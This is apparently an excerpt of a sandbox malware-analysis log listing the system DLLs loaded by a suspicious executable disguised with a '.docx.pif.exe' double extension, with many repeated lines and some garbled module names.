              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ?.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ?.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeSection loaded: amsi.dllJump to behavior
